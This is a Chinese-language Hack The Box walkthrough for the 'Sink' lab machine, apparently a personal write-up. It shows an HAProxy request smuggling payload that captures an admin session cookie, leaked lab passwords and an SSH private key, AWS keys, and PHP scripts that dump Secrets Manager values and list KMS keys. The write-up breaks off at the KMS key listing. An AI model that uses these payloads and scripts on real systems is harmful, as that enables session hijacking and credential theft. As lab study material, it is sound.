Hack-The-Box-walkthrough[sink]

introduce

OS: Linux
Difficulty: Insane
Points: 50
Release: 30 Jan 2021
IP: 10.10.10.225

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.225
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
3000/tcp open ppp?
3971/tcp filtered lanrevserver
5000/tcp open http Gunicorn 20.0.0
5502/tcp filtered fcp-srvr-inst1
15587/tcp filtered unknown
33076/tcp filtered unknown
33578/tcp filtered unknown
34042/tcp filtered unknown
35365/tcp filtered unknown
35514/tcp filtered unknown
37653/tcp filtered unknown
49460/tcp filtered unknown
52393/tcp filtered unknown
61352/tcp filtered unknown
62934/tcp filtered unknown
64002/tcp filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.91%I=7%D=2/8%Time=6020CC14%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\x
SF:20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\
SF:x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=592127b437b6a2ef;\
SF:x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=PccXCCJkvDgYnPWvzV9xVDHs
SF:7ac6MTYxMjc2MjI5NDgwMDY5NzAyMA;\x20Path=/;\x20Expires=Tue,\x2009\x20Feb
SF:\x202021\x2005:31:34\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAMEORI
SF:GIN\r\nDate:\x20Mon,\x2008\x20Feb\x202021\x2005:31:34\x20GMT\r\n\r\n<!D
SF:OCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\n<head\x2
SF:0data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=\"vi
SF:ewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\t<met
SF:a\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<title>\
SF:x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20</title>\n\t<link\
SF:x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crossorigin=\"use-cr
SF:edentials\">\n\t<meta\x20name=\"theme-color\"\x20content=\"#6cc644\">\n
SF:\t<meta\x20name=\"author\"\x20content=\"Gitea\x20-\x20Git\x20with\x20a\
SF:x20cup\x20of\x20tea\"\x20/>\n\t<meta\x20name=\"description\"\x20content
SF:=\"Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20pain
SF:less")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(HTTPOptions,1541,"HTTP/1\.0\x20404\x20Not\x20Found\r\n
SF:Content-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-
SF:US;\x20Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=9fc
SF:180b318dbde9c;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=5Ky4gK3kv
SF:oCly7f1byXVrrmaJuM6MTYxMjc2MjMwMTk2Njg0MjIyMA;\x20Path=/;\x20Expires=Tu
SF:e,\x2009\x20Feb\x202021\x2005:31:41\x20GMT;\x20HttpOnly\r\nX-Frame-Opti
SF:ons:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2008\x20Feb\x202021\x2005:31:41\x2
SF:0GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"them
SF:e-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<me
SF:ta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-sca
SF:le=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge
SF:\">\n\t<title>Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20with\x2
SF:0a\x20cup\x20of\x20tea\x20</title>\n\t<link\x20rel=\"manifest\"\x20href
SF:=\"/manifest\.json\"\x20crossorigin=\"use-credentials\">\n\t<meta\x20na
SF:me=\"theme-color\"\x20content=\"#6cc644\">\n\t<meta\x20name=\"author\"\
SF:x20content=\"Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\"\x20/>
SF:\n\t<meta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20with\x
SF:20a\x20c");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

port 3000

3000是gitea

port 5000

5000是devops

devops

5000端口随意注册登录,查看请求响应发现haproxy和gunicorn:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
HTTP/1.1 200 OK

Server: gunicorn/20.0.0

Date: Mon, 08 Feb 2021 05:45:01 GMT

Connection: close

Content-Type: text/html; charset=utf-8

Content-Length: 6392

Vary: Cookie

Via: haproxy

X-Served-By: a3bb59be4ff6

这个搭配搜索资料发现请求走私漏洞:

  • HAProxy HTTP request smuggling (CVE-2019-18277)

请求走私

随意注册登录进去后提交评论,进行请求走私,然后会触发管理员的request,之后去home查看,管理员的request header会作为评论显示在那里:

  • payload request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
POST /comment HTTP/1.1

Host: 10.10.10.225:5000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 358

Origin: http://10.10.10.225:5000

Connection: keep-alive

Referer: http://10.10.10.225:5000/home

Cookie: lang=zh-CN; i_like_gitea=1e8c376ed33ccd6e; _csrf=bsRZO43k9rTxqa5xKtfSmm747Y86MTYxMjc2MjIxNjA0MTE3MDI2MA; session=eyJlbWFpbCI6IjExODUxNTE4NjdAcXEuY29tIn0.YCDPxQ.cL41EY7kCeXTgvXKY-wD348qaDE

Upgrade-Insecure-Requests: 1

Transfer-Encoding: chunked



5

msg=a

0



POST /comment HTTP/1.1

Host: localhost:5000

Cookie: lang=zh-CN; i_like_gitea=1e8c376ed33ccd6e; _csrf=bsRZO43k9rTxqa5xKtfSmm747Y86MTYxMjc2MjIxNjA0MTE3MDI2MA; session=eyJlbWFpbCI6IjExODUxNTE4NjdAcXEuY29tIn0.YCDPxQ.cL41EY7kCeXTgvXKY-wD348qaDE

Content-Length: 300

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded



msg=

得到管理员的请求包,里面包含有管理员的cookie

1
2
3
4
5
6
GET /notes/delete/1234 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate Accept: */*
Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YB75fQ.Gp1wldORpfX5Ry7FC4mcewT-YCU
X-Forwarded-For: 127.0.0.1

管理员cookie

1
Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YB75fQ.Gp1wldORpfX5Ry7FC4mcewT-YCU

admin

替换cookie,现在就是管理员了

notes

admin三个notes就是三个不同系统的账号密码:

1
2
3
4
5
Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz

Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3

Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

gitea

使用code那个用户名密码可以登录3000的gitea:

1
root : FaH@3L>Z3})zzfQ3

Key_Management

在Key_Management的commits里可以找到marcus用户的私钥:

1
http://10.10.10.225:3000/root/Key_Management/commit/b01a6b7ed372d154ed0bc43a342a5e1203d07b1e
  • id_rsa
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAxi7KuoC8cHhmx75Uhw06ew4fXrZJehoHBOLmUKZj/dZVZpDBh27d
Pogq1l/CNSK3Jqf7BXLRh0oH464bs2RE9gTPWRARFNOe5sj1tg7IW1w76HYyhrNJpux/+E
o0ZdYRwkP91+oRwdWXsCsj5NUkoOUp0O9yzUBOTwJeAwUTuF7Jal/lRpqoFVs8WqggqQqG
EEiE00TxF5Rk9gWc43wrzm2qkrwrSZycvUdMpvYGOXv5szkd27C08uLRaD7r45t77kCDtX
4ebL8QLP5LDiMaiZguzuU3XwiNAyeUlJcjKLHH/qe5mYpRQnDz5KkFDs/UtqbmcxWbiuXa
JhJvn5ykkwCBU5t5f0CKK7fYe5iDLXnyoJSPNEBzRSExp3hy3yFXvc1TgOhtiD1Dag4QEl
0DzlNgMsPEGvYDXMe7ccsFuLtC+WWP+94ZCnPNRdqSDza5P6HlJ136ZX34S2uhVt5xFG5t
TIn2BA5hRr8sTVolkRkLxx1J45WfpI/8MhO+HMM/AAAFiCjlruEo5a7hAAAAB3NzaC1yc2
EAAAGBAMYuyrqAvHB4Zse+VIcNOnsOH162SXoaBwTi5lCmY/3WVWaQwYdu3T6IKtZfwjUi
tyan+wVy0YdKB+OuG7NkRPYEz1kQERTTnubI9bYOyFtcO+h2MoazSabsf/hKNGXWEcJD/d
fqEcHVl7ArI+TVJKDlKdDvcs1ATk8CXgMFE7heyWpf5UaaqBVbPFqoIKkKhhBIhNNE8ReU
ZPYFnON8K85tqpK8K0mcnL1HTKb2Bjl7+bM5HduwtPLi0Wg+6+Obe+5Ag7V+Hmy/ECz+Sw
4jGomYLs7lN18IjQMnlJSXIyixx/6nuZmKUUJw8+SpBQ7P1Lam5nMVm4rl2iYSb5+cpJMA
gVObeX9Aiiu32HuYgy158qCUjzRAc0UhMad4ct8hV73NU4DobYg9Q2oOEBJdA85TYDLDxB
r2A1zHu3HLBbi7Qvllj/veGQpzzUXakg82uT+h5Sdd+mV9+EtroVbecRRubUyJ9gQOYUa/
LE1aJZEZC8cdSeOVn6SP/DITvhzDPwAAAAMBAAEAAAGAEFXnC/x0i+jAwBImMYOboG0HlO
z9nXzruzFgvqEYeOHj5DJmYV14CyF6NnVqMqsL4bnS7R4Lu1UU1WWSjvTi4kx/Mt4qKkdP
P8KszjbluPIfVgf4HjZFCedQnQywyPweNp8YG2YF1K5gdHr52HDhNgntqnUyR0zXp5eQXD
tc5sOZYpVI9srks+3zSZ22I3jkmA8CM8/o94KZ19Wamv2vNrK/bpzoDIdGPCvWW6TH2pEn
gehhV6x3HdYoYKlfFEHKjhN7uxX/A3Bbvve3K1l+6uiDMIGTTlgDHWeHk1mi9SlO5YlcXE
u6pkBMOwMcZpIjCBWRqSOwlD7/DN7RydtObSEF3dNAZeu2tU29PDLusXcd9h0hQKxZ019j
8T0UB92PO+kUjwsEN0hMBGtUp6ceyCH3xzoy+0Ka7oSDgU59ykJcYh7IRNP+fbnLZvggZj
DmmLxZqnXzWbZUT0u2V1yG/pwvBQ8FAcR/PBnli3us2UAjRmV8D5/ya42Yr1gnj6bBAAAA
wDdnyIt/T1MnbQOqkuyuc+KB5S9tanN34Yp1AIR3pDzEznhrX49qA53I9CSZbE2uce7eFP
MuTtRkJO2d15XVFnFWOXzzPI/uQ24KFOztcOklHRf+g06yIG/Y+wflmyLb74qj+PHXwXgv
EVhqJdfWQYSywFapC40WK8zLHTCv49f5/bh7kWHipNmshMgC67QkmqCgp3ULsvFFTVOJpk
jzKyHezk25gIPzpGvbIGDPGvsSYTdyR6OV6irxxnymdXyuFwAAAMEA9PN7IO0gA5JlCIvU
cs5Vy/gvo2ynrx7Wo8zo4mUSlafJ7eo8FtHdjna/eFaJU0kf0RV2UaPgGWmPZQaQiWbfgL
k4hvz6jDYs9MNTJcLg+oIvtTZ2u0/lloqIAVdL4cxj5h6ttgG13Vmx2pB0Jn+wQLv+7HS6
7OZcmTiiFwvO5yxahPPK14UtTsuJMZOHqHhq2kH+3qgIhU1yFVUwHuqDXbz+jvhNrKHMFu
BE4OOnSq8vApFv4BR9CSJxsxEeKvRPAAAAwQDPH0OZ4xF9A2IZYiea02GtQU6kR2EndmQh
nz6oYDU3X9wwYmlvAIjXAD9zRbdE7moa5o/xa/bHSAHHr+dlNFWvQn+KsbnAhIFfT2OYvb
TyVkiwpa8uditQUeKU7Q7e7U5h2yv+q8yxyJbt087FfUs/dRLuEeSe3ltcXsKjujvObGC1
H6wje1uuX+VDZ8UB7lJ9HpPJiNawoBQ1hJfuveMjokkN2HR1rrEGHTDoSDmcVPxmHBWsHf
5UiCmudIHQVhEAAAANbWFyY3VzQHVidW50dQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----

user flag

然后直接用这个私钥ssh登录marcus用户,得到user.txt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# ssh -i id_rsa marcus@10.10.10.225
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-53-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon 08 Feb 2021 10:18:34 AM UTC

System load: 0.2
Usage of /: 40.5% of 17.59GB
Memory usage: 63%
Swap usage: 1%
Processes: 305
Users logged in: 0
IPv4 address for br-85739d6e29c0: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.10.10.225
IPv6 address for ens160: dead:beef::250:56ff:feb9:8eea


79 updates can be installed immediately.
26 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun Feb 7 17:56:51 2021 from 10.10.14.12
marcus@sink:~$ id
uid=1001(marcus) gid=1001(marcus) groups=1001(marcus)
marcus@sink:~$ whoami
marcus
marcus@sink:~$ ls
user.txt
marcus@sink:~$ cat user.txt
f9e781e7a74603e7e49c3749fe6182e0

AWS

根据Key_Management相关代码,主要就是aws操作,可以直接在已有代码的基础上进行操作, 下载代码,根据代码信息需要把4566端口转发出来,key和secret可以在Log_Management中找到:

1
2
3
4
http://10.10.10.225:3000/root/Log_Management/commit/e8d68917f2570f3695030d0ded25dc95738fb1ba

'key' => 'AKIAIUEN3QWCPSTEITJQ',
'secret' => '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'
1
ssh -N -L 4566:127.0.0.1:4566 -i id_rsa marcus@10.10.10.225

list secrets

  • list_secrets.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
'region' => 'eu',
'endpoint' => 'http://127.0.0.1:4566',
'credentials' => [
'key' => 'AKIAIUEN3QWCPSTEITJQ',
'secret' => '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'
],
'version' => 'latest'
]);
try {
$result = $client->listSecrets(array(
));
var_dump($result);
}
catch (AwsException $e) {
echo $e->getMessage();
echo "\n";
}
?>

运行php脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php list_secrets.php
object(Aws\Result)#128 (2) {
["data":"Aws\Result":private]=>
array(2) {
["SecretList"]=>
array(3) {
[0]=>
array(9) {
["ARN"]=>
string(70) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ElTxf"
["Name"]=>
string(13) "Jenkins Login"
["Description"]=>
string(39) "Master Server to manage release cycle 1"
["KmsKeyId"]=>
string(0) ""
["RotationEnabled"]=>
bool(false)
["RotationLambdaARN"]=>
string(0) ""
["RotationRules"]=>
array(1) {
["AutomaticallyAfterDays"]=>
int(0)
}
["Tags"]=>
array(0) {
}
["SecretVersionsToStages"]=>
array(1) {
["f5bfe052-d05c-46ec-a317-e563c9be2760"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
}
}
[1]=>
array(9) {
["ARN"]=>
string(67) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-qZfJI"
["Name"]=>
string(10) "Sink Panel"
["Description"]=>
string(46) "A panel to manage the resources in the devnode"
["KmsKeyId"]=>
string(0) ""
["RotationEnabled"]=>
bool(false)
["RotationLambdaARN"]=>
string(0) ""
["RotationRules"]=>
array(1) {
["AutomaticallyAfterDays"]=>
int(0)
}
["Tags"]=>
array(0) {
}
["SecretVersionsToStages"]=>
array(1) {
["32cf640a-5ef1-4f84-bd9e-2ab3c6514a53"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
}
}
[2]=>
array(9) {
["ARN"]=>
string(69) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-GoJSC"
["Name"]=>
string(12) "Jira Support"
["Description"]=>
string(22) "Manage customer issues"
["KmsKeyId"]=>
string(0) ""
["RotationEnabled"]=>
bool(false)
["RotationLambdaARN"]=>
string(0) ""
["RotationRules"]=>
array(1) {
["AutomaticallyAfterDays"]=>
int(0)
}
["Tags"]=>
array(0) {
}
["SecretVersionsToStages"]=>
array(1) {
["8dfff6f9-3250-4577-9f57-f5e945c828ba"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
}
}
}
["@metadata"]=>
array(4) {
["statusCode"]=>
int(200)
["effectiveUri"]=>
string(21) "http://127.0.0.1:4566"
["headers"]=>
array(9) {
["content-type"]=>
string(24) "text/html; charset=utf-8"
["content-length"]=>
string(4) "1679"
["access-control-allow-origin"]=>
string(1) "*"
["access-control-allow-methods"]=>
string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
["access-control-allow-headers"]=>
string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
["access-control-expose-headers"]=>
string(16) "x-amz-version-id"
["connection"]=>
string(5) "close"
["date"]=>
string(29) "Mon, 08 Feb 2021 10:49:11 GMT"
["server"]=>
string(13) "hypercorn-h11"
}
["transferStats"]=>
array(1) {
["http"]=>
array(1) {
[0]=>
array(0) {
}
}
}
}
}
["monitoringEvents":"Aws\Result":private]=>
array(0) {
}
}

get secret values

  • get_secret_values.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
'region' => 'eu',
'endpoint' => 'http://127.0.0.1:4566',
'credentials' => [
'key' => 'AKIAIUEN3QWCPSTEITJQ',
'secret' => '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'
],
'version' => 'latest'
]);

$secretIDs = ["arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ElTxf",
"arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-qZfJI",
"arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-GoJSC"];

try {
for ($i=0; $i<count($secretIDs); $i++) {
$result = $client->getSecretValue(array(
'SecretId' => $secretIDs[$i],
));
var_dump($result);
}
}
catch (AwsException $e) {
echo $e->getMessage();
echo "\n";
}

运行php脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php get_secret_values.php
object(Aws\Result)#101 (2) {
["data":"Aws\Result":private]=>
array(7) {
["ARN"]=>
string(70) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ElTxf"
["Name"]=>
string(13) "Jenkins Login"
["VersionId"]=>
string(36) "f5bfe052-d05c-46ec-a317-e563c9be2760"
["SecretString"]=>
string(57) "{"username":"john@sink.htb","password":"R);\)ShS99mZ~8j"}"
["VersionStages"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
["CreatedDate"]=>
object(Aws\Api\DateTimeResult)#97 (3) {
["date"]=>
string(26) "2021-02-06 20:18:57.000000"
["timezone_type"]=>
int(1)
["timezone"]=>
string(6) "+00:00"
}
["@metadata"]=>
array(4) {
["statusCode"]=>
int(200)
["effectiveUri"]=>
string(21) "http://127.0.0.1:4566"
["headers"]=>
array(9) {
["content-type"]=>
string(24) "text/html; charset=utf-8"
["content-length"]=>
string(3) "305"
["access-control-allow-origin"]=>
string(1) "*"
["access-control-allow-methods"]=>
string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
["access-control-allow-headers"]=>
string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
["access-control-expose-headers"]=>
string(16) "x-amz-version-id"
["connection"]=>
string(5) "close"
["date"]=>
string(29) "Mon, 08 Feb 2021 10:54:12 GMT"
["server"]=>
string(13) "hypercorn-h11"
}
["transferStats"]=>
array(1) {
["http"]=>
array(1) {
[0]=>
array(0) {
}
}
}
}
}
["monitoringEvents":"Aws\Result":private]=>
array(0) {
}
}
object(Aws\Result)#126 (2) {
["data":"Aws\Result":private]=>
array(7) {
["ARN"]=>
string(67) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-qZfJI"
["Name"]=>
string(10) "Sink Panel"
["VersionId"]=>
string(36) "32cf640a-5ef1-4f84-bd9e-2ab3c6514a53"
["SecretString"]=>
string(55) "{"username":"albert@sink.htb","password":"Welcome123!"}"
["VersionStages"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
["CreatedDate"]=>
object(Aws\Api\DateTimeResult)#131 (3) {
["date"]=>
string(26) "2021-02-06 20:18:57.000000"
["timezone_type"]=>
int(1)
["timezone"]=>
string(6) "+00:00"
}
["@metadata"]=>
array(4) {
["statusCode"]=>
int(200)
["effectiveUri"]=>
string(21) "http://127.0.0.1:4566"
["headers"]=>
array(9) {
["content-type"]=>
string(24) "text/html; charset=utf-8"
["content-length"]=>
string(3) "296"
["access-control-allow-origin"]=>
string(1) "*"
["access-control-allow-methods"]=>
string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
["access-control-allow-headers"]=>
string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
["access-control-expose-headers"]=>
string(16) "x-amz-version-id"
["connection"]=>
string(5) "close"
["date"]=>
string(29) "Mon, 08 Feb 2021 10:54:15 GMT"
["server"]=>
string(13) "hypercorn-h11"
}
["transferStats"]=>
array(1) {
["http"]=>
array(1) {
[0]=>
array(0) {
}
}
}
}
}
["monitoringEvents":"Aws\Result":private]=>
array(0) {
}
}
object(Aws\Result)#135 (2) {
["data":"Aws\Result":private]=>
array(7) {
["ARN"]=>
string(69) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-GoJSC"
["Name"]=>
string(12) "Jira Support"
["VersionId"]=>
string(36) "8dfff6f9-3250-4577-9f57-f5e945c828ba"
["SecretString"]=>
string(59) "{"username":"david@sink.htb","password":"EALB=bcC=`a7f2#k"}"
["VersionStages"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
["CreatedDate"]=>
object(Aws\Api\DateTimeResult)#140 (3) {
["date"]=>
string(26) "2021-02-06 20:18:57.000000"
["timezone_type"]=>
int(1)
["timezone"]=>
string(6) "+00:00"
}
["@metadata"]=>
array(4) {
["statusCode"]=>
int(200)
["effectiveUri"]=>
string(21) "http://127.0.0.1:4566"
["headers"]=>
array(9) {
["content-type"]=>
string(24) "text/html; charset=utf-8"
["content-length"]=>
string(3) "304"
["access-control-allow-origin"]=>
string(1) "*"
["access-control-allow-methods"]=>
string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
["access-control-allow-headers"]=>
string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
["access-control-expose-headers"]=>
string(16) "x-amz-version-id"
["connection"]=>
string(5) "close"
["date"]=>
string(29) "Mon, 08 Feb 2021 10:54:16 GMT"
["server"]=>
string(13) "hypercorn-h11"
}
["transferStats"]=>
array(1) {
["http"]=>
array(1) {
[0]=>
array(0) {
}
}
}
}
}
["monitoringEvents":"Aws\Result":private]=>
array(0) {
}
}

整理出账号密码

1
2
3
{"username":"john@sink.htb","password":"R);\)ShS99mZ~8j"}
{"username":"albert@sink.htb","password":"Welcome123!"}
{"username":"david@sink.htb","password":"EALB=bcC=`a7f2#k"}

david

通过aws相关操作得到david密码,切换到david:

1
2
3
4
5
6
marcus@sink:~$ su david
Password:
david@sink:/home/marcus$ id
uid=1000(david) gid=1000(david) groups=1000(david)
david@sink:/home/marcus$ whoami
david

servers.enc

发现一个加密的servers.enc文件,解密还是需要通过aws操作:

1
2
3
4
5
6
7
8
9
10
11
12
david@sink:~$ cd Projects/
david@sink:~/Projects$ ls
Prod_Deployment
david@sink:~/Projects$ cd Prod_Deployment/
david@sink:~/Projects/Prod_Deployment$ ls
servers.enc
david@sink:~/Projects/Prod_Deployment$ cat servers.enc
$j�p����8=R]=�µ+�,�gS��I=�7�▒�S�.ɒ`�46Z]���F�C����t(�{���?]!��Ci�5�V'�E����?�r�{3�r�\�)�{�#��(j�,.�$�X#D�r��_8\�Z»q<�o���*��<����'â0R/Z��<y�B�#
Y|�4�9�U�ݠ~��\M��"a�q�▒a
����Ļ;U���/2��둲Q�HL"S�{��
쯮��CCx�8룘u�Y����z��j?�y�����z� ���1w9�EV��\�T
F)c@�9s▒/�����?ġ����g�����Z���1��8;��o�:��'�����l剺��O���A!}�v�,��9H#Q�w�▒1������5Vt��6���d���5�&�$���hKY!$MPI�$z��MU��/?7�L��M*�ſ▒�david@sink:~/Projects/Prod_Deployment$

listkeys

项目里自带listkeys,直接运行报错,需要把里面的version改成latest,还有认证信息参考前面的脚本改:

  • listkeys1.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
require 'vendor/autoload.php';

use Aws\Kms\KmsClient;
use Aws\Exception\AwsException;

$KmsClient = new Aws\Kms\KmsClient([
'version' => 'latest',
'region' => 'eu',
'credentials' => [
'key' => 'AKIAIUEN3QWCPSTEITJQ',
'secret' => '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'
],
'endpoint' => 'http://127.0.0.1:4566'
]);

$limit = 100;

try {
$result = $KmsClient->listKeys([
'Limit' => $limit,
]);
var_dump($result);
} catch (AwsException $e) {
echo $e->getMessage();
echo "\n";
}

运行php脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php listkeys1.php | grep "string(36)" | cut -d " " -f 10
"0b539917-5eff-45b2-9fa1-e13f0d2c42ac"
"16754494-4333-4f77-ad4c-d0b73d799939"
"2378914f-ea22-47af-8b0c-8252ef09cd5f"
"2bf9c582-eed7-482f-bfb6-2e4e7eb88b78"
"53bb45ef-bf96-47b2-a423-74d9b89a297a"
"804125db-bdf1-465a-a058-07fc87c0fad0"
"837a2f6e-e64c-45bc-a7aa-efa56a550401"
